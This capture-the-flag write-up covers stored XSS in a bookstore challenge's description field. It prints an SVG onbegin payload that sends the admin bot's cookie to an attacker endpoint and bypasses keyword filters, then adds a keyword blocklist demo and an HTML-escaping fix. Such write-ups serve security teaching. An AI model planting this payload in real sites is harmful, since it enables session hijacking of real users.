Stealer Web Challenge
Description
"Welcome to the Bookstore! We've recently implemented a new feature that allows sellers to add detailed descriptions to their books. Our admin bot regularly checks these descriptions for any inappropriate content or out-of-stock items."
Vulnerability Overview
This challenge featured a stored Cross-Site Scripting (XSS) vulnerability that could be leveraged for session hijacking. The goal was to extract the admin bot's session cookie, which contained the flag. The cookie was readable from JavaScript, so it was not marked HttpOnly.
The vulnerability existed in the book description field, which was rendered as HTML without proper sanitization or escaping of user input. This allowed injection of JavaScript that executed whenever the admin bot viewed the book details page.
Exploitation Strategy
- Create a seller account to gain access to book creation functionality
- Add a book with a specially crafted XSS payload in the description
- Ensure the book would be reviewed by the admin bot
- Capture the admin's session when they viewed the malicious description
Step 1: Initial Reconnaissance
After registering for an account, I discovered that the application:
- Let users register as either buyers or sellers
- Let sellers create book listings with detailed descriptions
- Let buyers report books that were listed as in stock but actually unavailable
- Had an admin bot that reviewed these reports by visiting the reported book's page
This admin review process presented an opportunity to execute client-side code in the admin's browser context.
Step 2: Crafting the XSS Payload
I created a seller account and added a book with the following XSS payload in the description field:
<svg><animate onbegin="location='link?c='+document['coo'+'kie']" attributename=x>
This payload uses the onbegin event handler of an SVG animate element to exfiltrate cookies. The event fires as soon as the animation begins, which happens automatically when the page loads, so no interaction from the admin bot is needed. The string concatenation (['coo'+'kie']) bypasses simple filters that block the word "cookie". Here link is a placeholder for the URL of my controlled endpoint; in the real payload it must be an absolute URL, otherwise the browser resolves it relative to the book page.
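To make the bypass concrete, the following added example (not code from the original writeup) runs the page's payload through an assumed keyword blocklist of the kind the text calls a "simple filter", and shows the fix that actually works: HTML-escaping the description so it is rendered as text rather than markup. The blocklist contents are my assumption; the challenge's real filter is not shown.

```javascript
// Added example, not part of the original writeup.
// The payload string is the one from the page; the blocklist is an assumed
// stand-in for a "simple filter" and is not the challenge's real code.
const PAYLOAD =
  `<svg><animate onbegin="location='link?c='+document['coo'+'kie']" attributename=x>`;

// Naive blocklist filter (assumed): reject a description that contains any
// obvious keyword. Returns true when the description is accepted.
const BLOCKED = ['<script', 'javascript:', 'cookie', 'onerror', 'onload'];
function naiveBlocklistFilter(description) {
  const lower = description.toLowerCase();
  return !BLOCKED.some((word) => lower.includes(word));
}

// Proper fix: treat the description as text, not markup. Escaping the five
// HTML-significant characters makes any tag or attribute injection inert,
// regardless of how the attacker spells "cookie".
function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

// Rough check: does the output still contain raw tag or attribute syntax?
function containsMarkup(html) {
  return /<|>|"|'/.test(html);
}

// The page's payload is accepted by the blocklist, a textbook one is not,
// and escaping neutralises both.
console.log('payload passes naive filter:', naiveBlocklistFilter(PAYLOAD));
console.log('escaped payload:', escapeHtml(PAYLOAD));
```

The blocklist fails because it matches the literal word "cookie" while the browser evaluates 'coo'+'kie' at runtime, and because it never heard of onbegin; any blocklist has the same weakness. Escaping on output (or, if limited markup must be allowed, a proper allowlist sanitizer) removes the injection entirely, and marking the session cookie HttpOnly would have kept it out of reach of document.cookie even if the XSS remained.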
Step 3: Triggering Admin Review
- Set the book's stock to 0 to mark it as out of stock
- Created a second account as a buyer
- Reported the book as out of stock through the buyer interface
This triggered the admin review process, where the admin bot automatically visited the book's page to verify the report.
Step 4: Capturing the Flag
When the admin bot visited the book description page, the SVG animation began, the onbegin handler executed, and the bot's browser navigated to my controlled endpoint with the admin's cookies in the query string. The incoming request contained the admin's session cookie, which held the flag.
Flag
FlagY{******}